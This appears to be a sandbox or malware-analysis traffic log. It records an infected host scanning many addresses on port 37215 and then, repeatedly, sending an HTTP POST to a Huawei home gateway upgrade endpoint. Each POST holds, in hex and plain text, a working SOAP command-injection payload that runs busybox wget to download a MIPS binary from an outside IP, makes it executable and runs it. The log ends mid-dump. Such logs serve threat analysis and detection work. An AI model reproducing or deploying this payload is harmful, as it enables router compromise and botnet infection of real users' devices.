              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.113.66.44:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.6.252.117:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.21.117.201:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 156.226.26.205:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.79.219.224:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.186.201.232:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.184.176.92:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.11.200.238:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.62.96.6:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 156.216.138.93:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.47.174.199:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.75.161.139:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.1.253.34:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.255.237.62:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.215.225.158:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.246.240.193:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.17.187.161:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.89.242.81:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.9.78.250:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.132.215.10:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.184.146.210:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.130.105.244:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.199.212.19:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 156.225.131.99:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 156.199.231.208:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.33.240.142:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.199.46.195:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 156.196.251.48:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.13.135.98:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.203.183.193:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.202.166.92:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.180.196.61:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 156.178.146.228:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.91.24.63:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.11.184.139:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 156.98.7.218:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.161.142.37:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.127.147.43:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.250.248.31:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 156.141.255.227:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 156.71.112.138:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.150.239.92:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.122.223.54:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.177.203.192:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 41.132.45.190:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 156.6.49.188:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.62.96.54:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 156.43.7.47:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.143.115.183:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.2.192.34:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 156.58.68.98:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 197.104.71.105:37215
              Source: global trafficTCP traffic: 192.168.2.13:30401 -> 156.182.169.40:37215
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 